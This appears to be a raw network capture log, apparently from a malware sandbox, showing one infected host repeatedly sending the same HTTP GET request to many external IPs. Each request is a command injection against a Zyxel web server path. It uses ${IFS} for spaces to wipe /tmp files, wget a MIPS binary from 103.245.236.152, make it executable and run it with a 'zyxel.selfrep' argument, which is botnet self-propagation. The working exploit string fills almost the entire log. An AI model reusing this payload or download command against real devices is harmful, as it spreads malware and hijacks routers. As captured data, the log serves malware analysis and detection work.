                                        Jan 14, 2024 16:19:02.881954908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9359192.168.2.1357262174.84.213.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881992102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9360192.168.2.134028618.59.52.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882046938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9361192.168.2.133348298.130.234.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882061005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9362192.168.2.1333342159.84.151.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882117987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9363192.168.2.1347774159.180.196.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882147074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9364192.168.2.133916679.69.226.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882190943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9365192.168.2.1338482102.59.18.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882230997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9366192.168.2.1341858125.188.231.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882266998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9367192.168.2.135214062.159.247.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882293940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9368192.168.2.1342322194.182.28.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882344007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9369192.168.2.1337212182.170.10.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882379055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9370192.168.2.1334872145.175.126.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882432938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9371192.168.2.1344506194.83.172.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882460117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9372192.168.2.1344062119.197.14.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882513046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9373192.168.2.1346890121.196.19.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882534027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9374192.168.2.1333580125.44.122.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882611036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9375192.168.2.1342754165.67.83.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882630110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9376192.168.2.133448450.51.144.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882675886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9377192.168.2.1340814196.251.107.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882699966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9378192.168.2.135075212.164.147.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882749081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9379192.168.2.134282682.223.149.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882788897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9380192.168.2.1338530156.139.49.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882816076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9381192.168.2.1358722151.211.252.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882873058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9382192.168.2.135781676.15.247.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882894993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9383192.168.2.1332918184.19.87.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.882955074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9384192.168.2.136076851.0.168.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883002043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9385192.168.2.1348018110.72.124.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883038998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9386192.168.2.1353090223.12.148.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883094072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9387192.168.2.133443651.126.82.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883130074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9388192.168.2.1335938188.55.230.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883177042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9389192.168.2.13566284.151.83.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883222103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9390192.168.2.1355836109.124.138.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883271933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9391192.168.2.1348462217.240.88.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883320093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9392192.168.2.133939238.43.19.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883348942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9393192.168.2.135780024.50.89.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883404016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9394192.168.2.135031638.130.242.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883419991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9395192.168.2.1333762205.67.35.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883469105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9396192.168.2.1340554210.45.18.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883527994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9397192.168.2.1356830118.164.207.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883557081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9398192.168.2.135068651.95.95.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883598089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9399192.168.2.13538505.147.59.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883620977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9400192.168.2.135310432.140.162.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883668900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9401192.168.2.1355952212.134.202.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883722067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9402192.168.2.13502024.157.59.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883761883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9403192.168.2.133287020.175.127.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883780003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9404192.168.2.136034254.48.206.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883812904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9405192.168.2.134348261.193.242.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883863926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9406192.168.2.1337264210.37.5.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883871078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9407192.168.2.1360856174.225.213.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883893013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9408192.168.2.133390439.190.146.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883951902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9409192.168.2.1335756126.15.39.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.883972883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9410192.168.2.1360764183.104.140.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884016037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9411192.168.2.135350477.1.194.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884073019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9412192.168.2.1334578168.15.88.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884095907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9413192.168.2.135833071.178.152.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884140015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9414192.168.2.1336330109.232.26.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884167910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9415192.168.2.1354902174.42.156.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884202003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9416192.168.2.1338316151.60.164.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884236097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9417192.168.2.13348529.254.68.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884289980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9418192.168.2.133514218.49.33.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884342909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9419192.168.2.1348296133.137.145.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884370089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9420192.168.2.135598479.251.9.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884407997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9421192.168.2.1338392112.99.239.162443
                                        TimestampBytes transferredDirectionData
